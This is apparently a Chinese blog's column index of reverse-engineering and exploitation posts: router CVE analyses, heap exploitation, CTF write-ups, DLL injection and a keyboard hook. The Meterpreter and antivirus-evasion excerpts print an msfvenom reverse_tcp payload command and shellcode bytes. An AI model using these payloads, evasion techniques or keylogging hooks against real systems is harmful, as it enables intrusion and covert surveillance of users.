Reverse
文章平均质量分 80
「已注销」
这个作者很懒,什么都没留下…
展开
-
IOT Fuzz 两种思路
两种 FUZZ 框架介绍代码和测试用例基于BooFuzz做网络协议黑盒FuzzBooFuzz框架https://boofuzz.readthedocs.io/en/stable/user/quickstart.htmlhttps://github.com/jtpereyda/boofuzzBoofuzz是久经世故的Sulley Fuzz的分支和继承者。除了大量的错误修复,boofuzz的目标是可扩展性。目标是:Fuzz一切。基于BooFuzz做Ftp服务FuzzBooFuzz是基于状态和数据原创 2021-05-24 17:45:00 · 2719 阅读 · 1 评论 -
D-Link系列家用路由器漏洞分析总结
D-Link系列家用路由器漏洞分析总结⚡ 尚未了解清楚❗ 已编写好完整POC❓ 未能编写完整POC❌ 暂时不能实际验证DCS-2530LCVE-2020-25078 ❗ 敏感信息泄露D-Link DCS-1100 || DCS-1130CVE-2017-8416 ⚡DIR-850Lcgi动态web服务器CVE-2017-3193 ❗ 认证前栈溢出CVE-2017-14421 ❗ 路由器后门DIR-816独立web服务器CVE-2021-27114 ❓ 认证后栈溢出CVE原创 2021-04-27 15:49:44 · 2184 阅读 · 0 评论 -
D-Link DSL-2640B 固件漏洞分析
D-Link DSL-2640B 固件漏洞分析/bin/cfm 是整个系统服务的核心程序主函数启动过程由init函数完成初始化过程g_fnInitialize 保存了一系列 init 函数BcmWs_Init 关于 Web的初始化过程webmain函数负责web服务器 ,初始部分做了许多有关socket的控制,直接看对http请求的处理过程这部分处理了http头几处限制,不准进行目录穿越这部分代码依据请求文件后缀,分发处理函数web句柄数据结构 可以理解为struc原创 2021-04-23 18:20:26 · 399 阅读 · 0 评论 -
从meterpreter工作原理到免杀方式的分析
Meterpreter 工作原理msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=31012 -f c > test2.cunsigned char buf[] ="\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x64\x8b\x52\x30\x89\xe5""\x8b\x52\x0c\x8b\x52\x14\x0f\xb7\x4原创 2021-03-05 01:43:42 · 1247 阅读 · 1 评论 -
msfvenom payload 免杀简单实践
免杀简单实践实验各种渗透框架的后门,结果很多文件放到硬盘上就开始报毒,这样的话根本很难实际使用,网上搜索各种免杀工具,据发布有些时间的似乎也都不行,自己稍微熟悉点的可能是dll这一块,看到有通过加密payload然后再打包成dll,最后用regsvr32 加载执行的思路,感觉可以是实践下,好歹这个可以自己写下程序。选择payload这里选择msf的经典payload:windows/meterpreter/reverse_tcp//生成c形式的payloadmsfvenom -a x86 -原创 2021-02-22 13:45:18 · 916 阅读 · 0 评论 -
ret2dl_runtime_resolve实例分析
dl_runtime_resolve实例分析IDA静态分析这里用2019信安国赛的baby_pwn来做演示(就是因为这个做不出来去做了好多功课),实例程序test在文件夹下,hack.py是实现本地攻击的脚本首先使用checksec查看文件保护状态,由于是partial relo所以并没机会改写动态段的字符串表地址。所以我们直接伪造所有所需要的参数结构。ida动态段信息如下d_ta...原创 2019-05-07 23:04:44 · 464 阅读 · 0 评论 -
glibc动态链接器dl_runtime_resolve简要分析
dl_runtime_resolve简要分析资料glibc 2.9 sourcelinux elf 手册&各种百度搜索基于32位elf,64位一些结构会略有不同,新手学习,如果有理解错误,请师傅们帮忙指出。elf执行时动态绑定简要分析动态链接的过程动态链接中起到核心作用的是got节和plt节,链接器为所有共享目标文件(shared object)中未定义的(undef)外部...原创 2019-05-05 17:31:37 · 3054 阅读 · 0 评论 -
glibc2.29堆溢出tcache的利用方式及原理
ibc2.29 堆溢出tcache的利用方式及原理Dancing With Heap 与堆共舞二进制学习之旅参考资料:ctf-pwn https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/tcache_attack/#tcache-poisoningglibc wiki https://sourceware.org/glib...原创 2019-03-06 16:07:32 · 8128 阅读 · 0 评论 -
[PWN]安恒杯2019.2 filesystem
之前一直玩逆向,鉴于逆向和pwn都算同一类,寒假花了点时间补了下。由于自己太菜,被几个函数误导了好久。。。。最后到点刚好解出来,没能来得及提交。。。被自己蠢哭了main函数很简单,各种菜单输入匹配,一眼就看到个B4cKd0oR可疑的很!更进去看看是啥看到个system,那不是简单了,立马输入B4cKd0oR,键入ls命令程序返回了服务器上的文件目录,看到一个fl...原创 2019-02-24 18:31:37 · 684 阅读 · 0 评论 -
[Re]bugku CTF逆向题(持续更新)
目录bugku 入门逆向题解bugku easy_vb题解bugku easy_rebugku 游戏过关题解bugku love题解bugku file题解待续bugku 入门逆向题解打开程序,一闪而过去控制台环境打开只有一串字符,再次拖入ida em,啥都没有,flag果然就是这串字符bugku easy_vb题解一个vb写的程...原创 2018-12-05 21:41:27 · 3151 阅读 · 1 评论 -
Windows消息钩子[键盘监控]
之前看书,看到一眼消息钩子,一直没实践,现在有空弄了下,主要原理是利用windows自带SetWindowsHookEx API函数HHOOK SetWindowsHookEx(int idHook, //hook形式HOOKPROC lpfn //hook过程HINSTANCE hmod //钩子所属的...原创 2018-12-08 11:18:09 · 1900 阅读 · 0 评论 -
[Re]南邮ctf平台逆向题
继续学习,这次尝试做了一下南邮ctf平台的逆向题来练习目录第一题 HELLO,RE!第二题 ReadAsm2第三题 Py交易第四题 WxyVM第五题 maze第六题 WxyVM 2 第一题 HELLO,RE!打开ida,找到main函数按F5,hexray反编译就在眼前 flag{Welcome_To_RE_World!}第二题 ReadAs...原创 2018-12-03 14:23:16 · 1629 阅读 · 0 评论 -
[IDA]IDC脚本基础
IDC的变量idc使用三种基本数据类型 整形,字符串,浮点值idc使用auto关键字声明变量,使用extern关键字声明全局变量auto var = 1; //局部变量extern var2 = 1; //全局变量IDC的运算符idc支持绝大部分c的运算符,但是不支持如+=的复合运算符,并且idc所有整数操作数均作为有符号处理,移位运算符...原创 2018-12-07 16:55:34 · 6413 阅读 · 0 评论 -
gets()函数缓冲区溢出实验
用于测试的漏洞程序如下:#include<stdio.h>#include<windows.h>void pf(){ char buf[50]; gets(buf); printf("%s\n",buf); }int main(){ int a; printf("this is just a test\n"); pf(); ...原创 2018-10-24 16:13:29 · 4059 阅读 · 0 评论 -
DLL注入器编写
前段时间一直学习逆向工程核心原理,由于缺少WINAPI只是,后面的内容学起来有些抽象,于是反回去大致扫了一下《Windows核心编程》花了些时间写了个DLL注入器。 基本原理 进程对象在windows中,地址空间基本都是相对独立的,一个进程无法操作其他进程的空间,但是通过创建远程进程的线程,在原来进程的主线程之上添加一个线程,该线程属...原创 2018-09-29 09:38:38 · 3975 阅读 · 1 评论